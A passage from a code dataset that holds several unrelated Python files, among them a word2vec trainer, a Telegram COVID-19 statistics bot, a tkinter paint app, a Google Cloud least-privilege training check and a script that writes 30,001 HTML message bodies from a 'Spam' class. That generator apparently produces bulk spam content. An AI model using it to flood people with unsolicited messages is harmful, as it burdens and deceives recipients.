torch.tensor([word_to_ix[target]], device = device))\r\n # print('The cross entropy loss value is {}'.format(loss))\r\n loss.backward()\r\n optimizer.step()\r\n\r\n loss_total += loss.data\r\n \r\nprint('Epoch: {} |The cross entropy loss value is {}'.format(epoch + 1, loss_total))\r\n\r\ndef ix_to_word(ix):\r\n vocab_list = list(word_to_ix.keys())\r\n word_predicted = vocab_list[0]\r\n for word in word_to_ix:\r\n if word_to_ix[word] == ix:\r\n word_predicted = word\r\n\r\n return word_predicted\r\n\r\n\r\n# output the parameters\r\nword2vec = torch.zeros(vocab_size, EMBED_DIM)\r\nfor param in net.parameters():\r\n word2vec = word2vec + torch.Tensor.cpu(param.detach())\r\n\r\nword2numpy = word2vec.numpy()\r\nnp.savetxt(\"vectors.csv\", word2numpy, delimiter=\",\")\r\n\r\nprint(\"The vacabulary size is {}.\".format(vocab_size));\r\n\r\n## testing\r\ncontext = ['the','idea','a', 'abstract']\r\ncontext_vector = make_context_vector(context, word_to_ix)\r\na = torch.Tensor.cpu(net(context_vector)).data.numpy()\r\nprint('Context: {}\\n'.format(context))\r\nprint('Prediction: {}'.format(ix_to_word(a.argmax())))\r\nend = time.time()\r\nprint(\"Time elapsed: {}\".format(end - start))\r\nprint(device)\r\n","sub_path":"CBOWImplementation.py","file_name":"CBOWImplementation.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"307713665","text":"\"\"\"Homework file for my students to have fun with some algorithms! \"\"\"\n\n\ndef find_greatest_number(incoming_list):\n return max(incoming_list)\n\n\ndef find_least_number(incoming_list):\n return min(incoming_list)\n\n\ndef add_list_numbers(incoming_list):\n total_sum = 0\n if incoming_list is None:\n total_sum = 0\n else:\n total_sum = sum(incoming_list)\n return total_sum\n\n\ndef longest_value_key(incoming_dict):\n try:\n key_result = None\n max_value = 0\n for key in incoming_dict:\n if len(incoming_dict[key]) > max_value:\n max_value = len(incoming_dict[key])\n key_result = key\n except:\n incoming_dict = None\n\n return key_result\n","sub_path":"fun/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"193894052","text":"# coding: utf-8\n__author__ = 'п'\nfrom action import Spam\n\nclass Hbody():\n def body_print(self):\n s = Spam()\n html = '\\n'\n head = '\\n'\n title = '\\n'\n meta = '<meta http-equiv=\"Content-Type\" content=\"text/html; charset = utf-8\">\\n'\n ztitle = '\\n'\n zhead = '\\n'\n body = '\\n'\n p1 = '

'+s.hello()\n zstrong = '

\\n'\n p2 = '

'+s.rand()\n zp2 = '

\\n'\n p3 = '

\\n'\n zi = '

\\n'\n zbody = '\\n'\n zhtml = '\\n'\n mn = html+head+title+meta+ztitle+zhead+body+p1+zstrong+p2+zp2+p3+zi+zbody+zhtml\n return mn\n\nh = Hbody()\nd = 0\nwhile d <= 30000:\n with open(\"masseges/\"+str(d)+\"_body.html\", \"w\") as f:\n t = h.body_print()\n f.write(t.encode('utf-8').decode('cp1251')) # кодируем в том формате в котором работаем, а затем декодируем в том, в котором нужно получить файл\n d=d+1","sub_path":"body.py","file_name":"body.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"556178506","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport urllib.parse\r\nimport os\r\nfrom ebook import Chapter, Ebook\r\n\r\nBASE_URL = 'https://zh.m.wikisource.org/wiki/%E9%87%91%E7%93%B6%E6%A2%85'\r\n\r\npage = requests.get(BASE_URL)\r\nsoup = BeautifulSoup(page.content, 'html.parser')\r\n\r\nlinks = soup.find('table', class_='multicol').find_all('a')\r\ntitle = '金瓶梅'\r\n\r\ndef download():\r\n \r\n ebook = Ebook(title)\r\n\r\n for link in links:\r\n print(link)\r\n\r\n chapter_name = link.get_text()\r\n page = requests.get(urllib.parse.urljoin(BASE_URL, link['href']))\r\n soup = BeautifulSoup(page.content, 'html.parser', from_encoding=\"gb18030\")\r\n\r\n # create chapter header\r\n chapter = Chapter(chapter_name)\r\n\r\n chapter_content = get_content(soup)\r\n\r\n chapter.set_content(chapter_content)\r\n ebook.add_chapter(chapter)\r\n\r\n ebook.save()\r\ndef get_content(soup):\r\n c = BeautifulSoup()\r\n section = soup.find('section', class_='mf-section-0')\r\n ps = section.find_all('p')\r\n for p in ps:\r\n c.append(p)\r\n \r\n return c\r\nif __name__ == '__main__': \r\n download()","sub_path":"download_jpm.py","file_name":"download_jpm.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"55066357","text":"print(\"Wprowadz ilosc liczb ktore chcesz wpisac\")\r\n\r\nilosc = input()\r\n\r\nprint(\"Wprowadz liczby ktore chcesz posortowac\")\r\n\r\nlista =[]\r\n\r\ni = 0\r\n\r\nwhile(i', self.draw_start)\n self.draw_zone.bind('',self.draw_motion)\n self.draw_zone.bind('',self.draw_end)\n self.draw_zone.bind(\"\", self.change_text)\n\n self.mode = ''\n \n \n def keyFun(self, event):\n print(\"h\")\n print(event)\n\n\n def line_start(self,event):\n self.line_start_x=event.x\n self.line_start_y=event.y\n def line_motion(self,event):\n self.draw_zone.delete('temp_line_objects')\n self.draw_zone.create_line(self.line_start_x,self.line_start_y,event.x,event.y,fill=self.DEFAULT_COLOR,smooth=1,tags='temp_line_objects')\n def line_end(self,event):\n self.draw_zone.delete('temp_line_objects')\n x=self.draw_zone.create_line(self.line_start_x,self.line_start_y,event.x,event.y,fill=self.DEFAULT_COLOR,smooth=1)\n self.Line_objects.append(x)\n self.stack.append(x)\n\n\n def circle_start(self,event):\n self.circle_start_x = event.x\n self.circle_start_y = event.y\n def circle_motion(self,event):\n self.draw_zone.delete('temp_circle_objects') #sym de circle_end par rapport a circle_start\n #self.draw_zone.create_oval(event.x,event.y,(2*self.circle_start_x-event.x),(2*self.circle_start_y-event.y),tags='temp_circle_objects')\n self.draw_zone.create_oval((self.circle_start_x),(self.circle_start_y),event.x,event.y,fill=None,tags='temp_circle_objects')\n def circle_end(self,event):\n self.draw_zone.delete('temp_circle_objects') \n #x=self.draw_zone.create_oval(event.x,event.y,(2*self.circle_start_x-event.x),(2*self.circle_start_y-event.y))\n x=self.draw_zone.create_oval((self.circle_start_x),(self.circle_start_y),event.x,event.y,fill=None)\n self.stack.append(x)\n\n\n def point_start(self,event):\n x = self.draw_zone.create_line(event.x,event.y,event.x+1,event.y+1)\n self.Point_objects.append(x)\n\n#create line from this place to previous place\n\n def freehand_start(self, event):\n self.px = event.x\n self.py = event.y\n self.stack.append(\"start\")\n def freehand_motion(self, event):\n x = self.draw_zone.create_line(self.px, self.py, event.x, event.y, fill=self.DEFAULT_COLOR,smooth=1)\n self.px = event.x\n self.py = event.y\n self.stack.append(x)\n def freehand_end(self, event):\n self.stack.append(\"end\")\n\n\n def text_start(self, event):\n self.text_start_x = event.x\n self.text_start_y = event.y\n def text_motion(self, event):\n self.draw_zone.delete('temp_text_objects')\n self.draw_zone.create_text(self.text_start_x, self.text_start_y, text = \"hello\", font = (\"Purisa\", math.floor(0.8*(event.y-self.text_start_y))), tags = 'temp_text_objects', anchor = NW)\n def text_end(self, event):\n self.draw_zone.delete('temp_text_objects')\n self.d = self.draw_zone.create_text(self.text_start_x, self.text_start_y, text = \"hello\", font = (\"Purisa\", math.floor(0.8*(event.y-self.text_start_y))), anchor = NW)\n self.mode = 'edit'\n def change_text(self, event):\n print(self.d)\n self.d.config(text=\"hello\")\n # self.draw_zone.delete(self.d)\n\n \n \n \n\n def set_tool_line(self):\n self.tool_option = 'line'\n def set_tool_circle(self):\n self.tool_option = 'circle'\n def set_tool_point(self):\n self.tool_option = 'point'\n def set_tool_freehand(self):\n self.tool_option = 'freehand'\n def set_tool_text(self):\n self.tool_option = 'text'\n\n def draw_start(self,event):\n print(\"hello\")\n if self.tool_option=='line':\n self.line_start(event)\n elif self.tool_option == 'circle':\n self.circle_start(event)\n elif self.tool_option=='point':\n self.point_start(event)\n elif self.tool_option == \"freehand\":\n self.freehand_start(event)\n elif self.tool_option == 'text':\n self.text_start(event)\n\n def draw_motion(self,event):\n if self.tool_option=='line':\n self.line_motion(event)\n if self.tool_option == 'freehand':\n self.freehand_motion(event)\n elif self.tool_option == 'circle':\n self.circle_motion(event)\n elif self.tool_option == 'text':\n self.text_motion(event)\n def draw_end(self,event):\n if self.tool_option=='line':\n self.line_end(event)\n if self.tool_option=='freehand':\n self.freehand_end(event)\n elif self.tool_option == 'circle':\n self.circle_end(event)\n elif self.tool_option == 'text':\n self.text_end(event)\n\n def undo(self):\n \n x = self.stack.pop()\n if x == \"end\":\n while x != \"start\":\n x = self.stack.pop()\n self.draw_zone.delete(x)\n else:\n self.draw_zone.delete(x) \n\n def alert(self):\n print('yo')\n\nif __name__ == '__main__':\n ge = Paint()\n","sub_path":"canvas3.py","file_name":"canvas3.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"62664753","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nModulo bot - Mantem as funções que gerenciam o bot\r\n\"\"\"\r\n\r\n\r\nimport os\r\nimport logging\r\nimport pickle\r\nimport datetime\r\nimport re\r\nimport json\r\n\r\nfrom uuid import uuid4\r\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters, InlineQueryHandler\r\nfrom telegram import InlineQueryResultArticle, InputTextMessageContent, ParseMode\r\n\r\nfrom dasbot.corona import SeriesChart, DataPanel\r\nfrom dasbot.world import WorldOMeterData\r\nfrom dasbot.oms import OMSData\r\nfrom dasbot.brasil_io import BrasilIOData\r\nfrom dasbot.db import JobCacheRepo, BotLogRepo, CasesRepo\r\n\r\n\r\n# Enable logging\r\nlogger = logging.getLogger(__name__)\r\n\r\nuse_db = os.environ.get(\"USE_DB\", False)\r\n# futuros comandos administrativos\r\nadmin_id = int(os.environ.get(\"ADMIN_ID\", 0))\r\n# ajuste para o nome do canal a receber as atualizações\r\nchannel_id = os.environ.get(\"CHANNEL_ID\", \"\")\r\n\r\nif use_db:\r\n logging.basicConfig(level=logging.INFO)\r\nelse:\r\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\r\n filemode=\"a\",\r\n filename=\"logs/log_{}.log\".format(\r\n datetime.datetime.strftime(datetime.datetime.now(), \"%Y_%m_%d\")),\r\n level=logging.INFO)\r\n\r\n\r\ndef _log_message_data(message):\r\n result = dict()\r\n result[\"date\"] = message[\"date\"].isoformat()\r\n result[\"chat_id\"] = message[\"chat\"][\"id\"]\r\n result[\"username\"] = message[\"chat\"][\"username\"] or message[\"chat\"][\"last_name\"] or message[\"chat\"][\"first_name\"]\r\n result[\"text\"] = message[\"text\"]\r\n return json.dumps(result).replace(\"\\\"\", \"\\'\")\r\n\r\n\r\nclass JobsInfo(object):\r\n def __init__(self, file_name):\r\n self._jobs = dict()\r\n self.file_name = file_name\r\n self._props = [\"interval\", \"repeat\", \"context\"]\r\n\r\n @property\r\n def jobs(self):\r\n return self._jobs\r\n\r\n def save(self):\r\n with open(self.file_name, 'wb') as f:\r\n data = {key: {var: getattr(job, var) for var in self._props} for key, job in self._jobs.items()}\r\n pickle.dump(data, f)\r\n\r\n def load(self):\r\n if os.path.exists(self.file_name):\r\n with open(self.file_name, 'rb') as f:\r\n return pickle.load(f)\r\n return {}\r\n\r\n def push(self, key, data):\r\n self._jobs[key] = data\r\n\r\n def pop(self, key):\r\n result = self._jobs[key]\r\n del self._jobs[key]\r\n return result\r\n\r\n def exists(self, key):\r\n return key in self._jobs\r\n\r\n\r\nclass JobsDBInfo(JobsInfo):\r\n def __init__(self):\r\n super().__init__(\"\")\r\n\r\n def save(self):\r\n repo = JobCacheRepo()\r\n for key, job in self.jobs.items():\r\n data = dict()\r\n data[\"job_id\"] = key\r\n for prop in [\"interval\", \"repeat\"]:\r\n data[prop] = getattr(job, prop)\r\n for prop in [\"region\", \"chat_id\", \"new\"]:\r\n data[prop] = job.context.get(prop)\r\n for prop, i in {\"cases\": 0, \"deaths\": 1, \"recovery\": 2}.items():\r\n data[prop] = job.context.get(\"last\")[i]\r\n repo.add(data)\r\n repo.save()\r\n\r\n def load(self):\r\n jobs = dict()\r\n repo = JobCacheRepo()\r\n repo.load()\r\n for row in repo.rows:\r\n data = dict()\r\n data[\"interval\"] = row[\"interval\"]\r\n data[\"repeat\"] = row[\"repeat\"]\r\n data[\"context\"] = {\"region\": row[\"region\"],\r\n \"chat_id\": row[\"chat_id\"],\r\n \"new\": row[\"new\"],\r\n \"last\": [row[\"cases\"], row[\"deaths\"], row[\"recovery\"]]}\r\n jobs[row[\"job_id\"]] = data\r\n return jobs\r\n\r\n\r\nclass DBLogHandler(logging.Handler):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n def emit(self, record):\r\n message = record.getMessage()\r\n command = re.findall(r'Arrive ([/\\w]+) (?:command|message) \"([^\"]+)\"', message)\r\n if command:\r\n command_string = command[0][1]\r\n args = json.loads(command_string.replace(\"\\'\", \"\\\"\"))\r\n repo = BotLogRepo()\r\n data = dict()\r\n data[\"chat_id\"] = args[\"chat_id\"]\r\n data[\"username\"] = args[\"username\"]\r\n data[\"command\"] = command[0][0]\r\n data[\"args\"] = args[\"text\"]\r\n repo.add(data)\r\n repo.save()\r\n\r\n\r\ndef start(update, context):\r\n \"\"\"Send a message when the command /start is issued.\"\"\"\r\n update.message.reply_text(\"\"\"Olá. Sou um bot de dados de casos de COVID-19 no Brasil.\r\n Digite /help para ver as opções\"\"\")\r\n\r\n\r\ndef help(update, context):\r\n \"\"\"Send a message when the command /help is issued.\"\"\"\r\n logger.info('Arrive /help command \"%s\"', _log_message_data(update.effective_message))\r\n update.message.reply_text(\"\"\"Comandos que você pode enviar\r\n /start : inicia o bot\r\n /help : mostra a ajuda\r\n /stats : mostra os números de casos mais atualizados do Brasil\r\n /chart : desenha um gráfico com a região informada, ex: /chart SP\r\n /listen : observa os dados de uma região a cada X minutos (experimental)\r\n /mute : para de observar a região programada com o /listen\r\nEnvie uma sigla de estado ou nome de cidade, para saber os confirmados nessa região\r\nFontes de Dados: \r\n WorldOmeter (https://www.worldometers.info/coronavirus/)\r\n Brasil.io (https://brasil.io/dataset/covid19/caso) CC BY-SA 4.0\r\n OMS (https://dashboards-dev.sprinklr.com)\"\"\")\r\n\r\n\r\ndef error(update, context):\r\n \"\"\"Log Errors caused by Updates.\"\"\"\r\n logger.warning('Update \"%s\" caused error \"%s\"', update, context.error)\r\n\r\n\r\ndef stats(update, context):\r\n logger.info('Arrive /stats command \"%s\"', _log_message_data(update.effective_message))\r\n sources = [WorldOMeterData(), OMSData(), BrasilIOData()]\r\n result = []\r\n for corona in sources:\r\n corona.refresh()\r\n if corona.last_date:\r\n result.append(corona.description)\r\n\r\n if result:\r\n update.message.reply_markdown(\"Região: *{}*\\n{}\".format(\"BR\", \"\\n\".join(result)))\r\n else:\r\n update.message.reply_text(\"Dados não disponíveis. Tente mais tarde\")\r\n\r\n\r\ndef general(update, context):\r\n logger.info('Arrive text message \"%s\"', _log_message_data(update.effective_message))\r\n region = update.message.text\r\n result = []\r\n sources = [WorldOMeterData(region), OMSData(region), BrasilIOData(region)]\r\n for corona in sources:\r\n corona.refresh()\r\n if corona.last_date:\r\n result.append(corona.description)\r\n\r\n if result:\r\n update.message.reply_markdown(\"Região: *{}*\\n{}\".format(region, \"\\n\".join(result)))\r\n else:\r\n update.message.reply_text(\"\"\"Região não reconhecida ou sem dados. \r\nEnvie a sigla do estado em maiúsculas, nomes de cidade com acentos. \r\nEnvie /help para ver a ajuda.\"\"\")\r\n\r\n\r\ndef _get_chart(regions):\r\n sources = []\r\n if regions:\r\n for region in regions:\r\n corona = BrasilIOData(region.strip())\r\n corona.refresh()\r\n sources.append(corona)\r\n\r\n chart_br = SeriesChart(*sources)\r\n if chart_br.validate():\r\n image = chart_br.image()\r\n caption = \"Atualizado: {}\".format(sources[0].last_date.strftime(\"%d-%m-%Y %H:%M\"))\r\n return image, caption\r\n return None\r\n\r\n\r\ndef chart(update, context):\r\n logger.info('Arrive /chart command \"%s\"', _log_message_data(update.effective_message))\r\n regions = \" \".join(context.args).split(\",\")\r\n chart_data = _get_chart(regions)\r\n if chart_data:\r\n update.message.reply_photo(photo=chart_data[0], caption=chart_data[1])\r\n else:\r\n update.message.reply_text(\"\"\"A lista de regiões não foi reconhecida. \r\nEnvie a sigla de estado em maiúsculas, nomes de cidade com acentos.\r\nExemplos: /chart SP, RJ - /chart São Paulo, Belo Horizonte \r\nEnvie /help para ver a ajuda.\"\"\")\r\n\r\n\r\ndef inline_query(update, context):\r\n \"\"\"Handle the inline query.\"\"\"\r\n query = update.inline_query.query\r\n if not query:\r\n return\r\n\r\n logger.info('Query inline \"%s\"', update.inline_query)\r\n\r\n sources = [WorldOMeterData(query), OMSData(query), BrasilIOData(query)]\r\n results = []\r\n\r\n for corona in sources:\r\n corona.refresh()\r\n if corona.last_date:\r\n results.append(InlineQueryResultArticle(\r\n id=uuid4(),\r\n title=\"{} por {} em {}\".format(query, corona.data_source, corona.last_date.strftime(\"%d-%m\")),\r\n input_message_content=InputTextMessageContent(\r\n corona.description,\r\n parse_mode=ParseMode.MARKDOWN)))\r\n\r\n update.inline_query.answer(results, cache_time=60)\r\n\r\n\r\ndef unknown(update, context):\r\n update.message.reply_text(\"Não entendi esse comando\")\r\n\r\n\r\ndef on_change_notifier(context):\r\n region = context.job.context[\"region\"]\r\n sources = [BrasilIOData(region)]\r\n for corona in sources:\r\n corona.refresh()\r\n if corona.last_date:\r\n last = context.job.context[\"last\"]\r\n if last and sum(last) > 0:\r\n changes = [i - j for i, j in zip(corona.get_data(), last)]\r\n else:\r\n changes = [0, 0, 0]\r\n if sum(changes) > 0 or not context.job.context.get(\"new\", True):\r\n description = \"Região: *{}*\\n{}\".format(region, corona.get_description(changes))\r\n context.bot.send_message(chat_id=context.job.context[\"chat_id\"],\r\n text=description,\r\n parse_mode=ParseMode.MARKDOWN)\r\n context.job.context[\"last\"] = corona.get_data()\r\n\r\n\r\ndef refresh_data(context):\r\n WorldOMeterData.load()\r\n OMSData.load()\r\n BrasilIOData.load()\r\n\r\n job_context = context.job.context\r\n\r\n # busca atualizações de dados nos data sources para informar no canal\r\n # e para guardar na tabela de casos, se o banco estiver ativo\r\n region = job_context[\"region\"]\r\n sources = [WorldOMeterData(region), BrasilIOData(region)]\r\n for corona in sources:\r\n corona.refresh()\r\n if corona.last_date:\r\n corona_data = corona.get_data()\r\n if corona.data_source not in job_context:\r\n job_context[corona.data_source] = {\"last\": corona_data}\r\n else:\r\n last = job_context[corona.data_source][\"last\"]\r\n changes = [i - j for i, j in zip(corona_data, last)]\r\n if sum(changes) > 0:\r\n job_context[corona.data_source][\"last\"] = corona_data\r\n if job_context[\"chat_id\"]:\r\n context.bot.send_message(job_context[\"chat_id\"],\r\n text=corona.get_description(changes),\r\n parse_mode=ParseMode.MARKDOWN)\r\n if use_db:\r\n repo = CasesRepo()\r\n data = {\r\n \"source\": corona.data_source,\r\n \"region\": region,\r\n \"cases\": corona_data[0],\r\n \"deaths\": corona_data[1],\r\n \"recovery\": corona_data[2],\r\n \"date\": corona.last_date\r\n }\r\n repo.add(data)\r\n repo.save()\r\n\r\n\r\nif use_db:\r\n logger.addHandler(DBLogHandler())\r\n _jobs = JobsDBInfo()\r\nelse:\r\n _jobs = JobsInfo(\"logs/jobs.pickle\")\r\n\r\n\r\ndef set_timer(update, context):\r\n \"\"\"Adiciona uma região na lista de jobs\"\"\"\r\n logger.info('Arrive /listen command \"%s\"', _log_message_data(update.effective_message))\r\n chat_id = update.message.chat_id\r\n try:\r\n region = context.args[0]\r\n minutes = int(context.args[1]) if len(context.args) > 1 else 5\r\n only_new = context.args[2] == \"--new\" if len(context.args) > 2 else False\r\n\r\n if not region or minutes < 1:\r\n raise ValueError\r\n\r\n # Add job to queue\r\n job = context.job_queue.run_repeating(on_change_notifier, minutes * 60, first=5,\r\n context={\"chat_id\": str(chat_id), \"region\": region,\r\n \"new\": only_new, \"last\": [0, 0, 0]})\r\n _jobs.push(str(chat_id), job)\r\n _jobs.save()\r\n\r\n update.message.reply_text('Monitoramento ativado!')\r\n\r\n except (IndexError, ValueError):\r\n update.message.reply_text(\"Use: /listen \\nUse: /mute para parar de observar\")\r\n\r\n\r\ndef unset_timer(update, context):\r\n \"\"\"Remove o job programado\"\"\"\r\n logger.info('Arrive /mute command \"%s\"', _log_message_data(update.effective_message))\r\n chat_id = str(update.message.chat_id)\r\n\r\n if not _jobs.exists(chat_id):\r\n update.message.reply_text('Nenhum monitoramento ativo')\r\n return\r\n\r\n job = _jobs.pop(chat_id)\r\n job.schedule_removal()\r\n _jobs.save()\r\n\r\n update.message.reply_text('Monitoramento desativado')\r\n\r\n\r\ndef main():\r\n \"\"\"Start the bot.\"\"\"\r\n # Certifique-se que exista uma variavel de ambiente com o nome TELEGRAM_TOKEN\r\n # setada com o token do seu bot\r\n updater = Updater(os.environ.get(\"TELEGRAM_TOKEN\", \"Get token on bot father!\"), use_context=True)\r\n\r\n dp = updater.dispatcher\r\n\r\n dp.add_handler(CommandHandler(\"start\", start))\r\n dp.add_handler(CommandHandler(\"help\", help))\r\n dp.add_handler(CommandHandler(\"stats\", stats))\r\n dp.add_handler(CommandHandler(\"chart\", chart))\r\n dp.add_handler(CommandHandler(\"listen\", set_timer, pass_args=True, pass_job_queue=True))\r\n dp.add_handler(CommandHandler(\"mute\", unset_timer))\r\n dp.add_handler(MessageHandler(Filters.text & ~Filters.update.channel_post, general))\r\n dp.add_handler(InlineQueryHandler(inline_query))\r\n dp.add_handler(MessageHandler(Filters.command, unknown))\r\n\r\n # job para atualizar os dados das fontes e atualizar o canal caso haja novos casos\r\n refresh_time = int(os.environ.get(\"REFRESH_TIME\", \"600\"))\r\n dp.job_queue.run_repeating(refresh_data, refresh_time, first=5, context={\"chat_id\": channel_id, \"region\": \"BR\"})\r\n\r\n # carrega a lista de jobs que estavam programados\r\n\r\n jobs = _jobs.load()\r\n for key, data in jobs.items():\r\n if data.get(\"repeat\", True):\r\n _jobs.push(key, dp.job_queue.run_repeating(on_change_notifier,\r\n data.get(\"interval\", 300), context=data.get(\"context\")))\r\n else:\r\n _jobs.push(key, dp.job_queue.run_once(on_change_notifier,\r\n data.get(\"interval\", 300), context=data.get(\"context\")))\r\n\r\n # log all errors\r\n dp.add_error_handler(error)\r\n\r\n # Inicia o Bot no modo polling\r\n updater.start_polling()\r\n\r\n # Roda até receber um Ctrl-C\r\n updater.idle()\r\n\r\n _jobs.save()\r\n","sub_path":"dasbot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":15020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"344431519","text":"from flask import render_template\ndef main(request):\n\tfrom googleapiclient import discovery\n\timport google.auth\n\timport os\n\t\n\t\n\t# Set the project ID\n\tPROJECT_ID = os.environ['GCP_PROJECT']\n\t\n\t# Get function env variable\n\tNONCE = os.environ.get('NONCE', 'Specified environment variable is not set.')\n\tRESOURCE_PREFIX = os.environ.get('RESOURCE_PREFIX', 'Specified environment variable is not set.')\n\tLEVEL_NAME = os.environ.get('LEVEL_NAME', 'Specified environment variable is not set.')\n\n\tPRI = {{fvar|safe}}[0]\n\t\n\t# Get credential of cloud function account\n\tcredentials, project_id = google.auth.default()\n\n\t# Build cloudresourcemanager REST API python object\n\tservice_r = discovery.build('cloudresourcemanager','v1', credentials=credentials)\n\t\n\t# Service account \n\tsa = f'serviceAccount:{RESOURCE_PREFIX}-f-access-{NONCE}-sa@{PROJECT_ID}.iam.gserviceaccount.com'\n\n\tget_iam_policy_request_body = {}\n\t\n\troles =[]\n\tpermissions =[]\n\tmsg = ''\n\terr=''\n\ttry:\n\t\tbindings = service_r.projects().getIamPolicy(resource=PROJECT_ID, body=get_iam_policy_request_body).execute()[\"bindings\"]\n\t\tfor r in bindings:\n\t\t\tif sa in r[\"members\"]:\n\t\t\t\troles.append(r[\"role\"])\n\texcept Exception as e: \n\t\tpermissions =[]\n\t\tmsg ='There is an error'\n\t\terr = str(e)\n\tif len(roles)>1 or PRI != roles[0]:\n\t\tmsg='Not least privilege role, please try again!'\n\telse:\n\t\tmsg='Congratulations! You got the least privilege role.'\n\t\t\n\t\t\n\t# Build iam REST API python object\n\tservice_i = discovery.build('iam','v1', credentials=credentials)\n\n\t\n\ttry:\n\t\tpermissions = service_i.roles().get(name=roles[0]).execute()[\"includedPermissions\"]\n\t\t\n\t\t\n\texcept Exception as e: \n\t\tpermission =[]\n\t\terr = str(e)\n\t\n\treturn render_template(f'{RESOURCE_PREFIX}-check.html', pers=permissions, msg=msg, rn=roles[0], err=err, prefix=RESOURCE_PREFIX,level_name=LEVEL_NAME,nonce=NONCE)","sub_path":"core/levels/leastprivilege/pd1/pd1/functioncheck/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"57390351","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/12/14 19:03\n# @Author : zyk\n\n# 给定一个二叉树,找出其最大深度。\n#\n# 二叉树的深度为根节点到最远叶子节点的最长路径上的节点数。\n#\n# 说明: 叶子节点是指没有子节点的节点。\n#\n# 示例:\n# 给定二叉树 [3,9,20,null,null,15,7],\n#\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n# 返回它的最大深度 3 。\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def maxDepth(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if not root:\n return 0\n else:\n left = self.maxDepth(root.left)\n right = self.maxDepth(root.right)\n return max(left, right)+1\n","sub_path":"104_Maximum Depth of Binary Tree.py","file_name":"104_Maximum Depth of Binary Tree.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"99666777","text":"import socket\r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\r\nip = socket.gethostname()\r\nport = 8001\r\n\r\nsock.bind((ip, port))\r\nprint(\"Running on:\", ip, port)\r\n\r\nreceived_mesg = sock.recv(1024).decode('utf-8')\r\n\r\nif received_mesg == \"ping\":\r\n sock.sendto(str(\"PONG\").encode('utf-8'), (ip, 8000))\r\n print(\"Sending:\", \"PONG\")","sub_path":"Recieving_client.py","file_name":"Recieving_client.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"243205317","text":"import gpxpy\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as md\nfrom matplotlib import cm\nimport time\n\n\ndef loadGPX(link_to_gpx):\n # type: (String) -> matplotlib.pyplot\n\n gpx_file = open(link_to_gpx)\n\n gpx = gpxpy.parse(gpx_file);\n longitudes = [];\n latitudes = [];\n timestamps = [];\n\n # Add data to above created arrays\n for gpx_track in gpx.tracks:\n for segment in gpx_track.segments:\n for point in segment.points:\n\n latitudes.append(point.latitude)\n longitudes.append(point.longitude)\n\n timestamp = point.time\n # Transform to Number from Epoch Timestring\n timestamps.append(md.epoch2num(time.mktime(timestamp.timetuple())))\n\n # Init figure and Axes\n fig = plt.figure()\n ax = Axes3D(fig)\n\n # Create Scatterplot with colormap\n plot = ax.scatter(latitudes, longitudes, timestamps, c=range(len(timestamps)), cmap=cm.winter)\n\n # Format the dates\n ax.zaxis_date()\n zfmt = md.DateFormatter(\"%H:%M\")\n ax.zaxis.set_major_formatter(zfmt)\n\n # Axis labels\n ax.set_zlabel('Time', rotation=90)\n ax.set_xlabel('Latitude')\n ax.set_ylabel('Longitude')\n\n # Add legend\n fig.colorbar(plot, label='Time passed', shrink=0.5)\n\n plt.savefig('time_space_cube.png')\n plt.show()\n\nloadGPX('/Users/nico/Desktop/ArcGIS-Data/track.gpx')","sub_path":"time_space_cube.py","file_name":"time_space_cube.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"194245631","text":"from django.shortcuts import render,HttpResponse,get_object_or_404\r\nfrom account.models import VsUsers\r\nfrom videos.models import VsVideos\r\nfrom .models import VsFavourite\r\nfrom django.http import HttpResponse, JsonResponse\r\n# Create your views here.\r\n\r\n\r\ndef Checkfavourite_videos_list(request,video_id):\r\n if video_id:\r\n get_video_ins = get_object_or_404(VsVideos,Videos_id=video_id)\r\n get_user_ins = get_object_or_404(VsUsers,user=request.user)\r\n if VsFavourite.objects.filter(Subscribe=get_video_ins.Created_By).filter(VsUser=get_user_ins).exists():\r\n status = \"1\"\r\n else:\r\n status = \"0\"\r\n return JsonResponse({\"status\":status})\r\n\r\ndef updatefavourite_videos_list(request,video_id):\r\n if video_id:\r\n status = \"0\"\r\n message = \"\"\r\n get_video_ins = get_object_or_404(VsVideos,Videos_id=video_id)\r\n get_user_ins = get_object_or_404(VsUsers,user=request.user)\r\n if VsFavourite.objects.filter(Subscribe=get_video_ins.Created_By).filter(VsUser=get_user_ins).exists():\r\n VsFavourite.objects.filter(Subscribe=get_video_ins.Created_By).filter(VsUser=get_user_ins).delete()\r\n status = \"1\"\r\n message = \"Video remove in your favourite 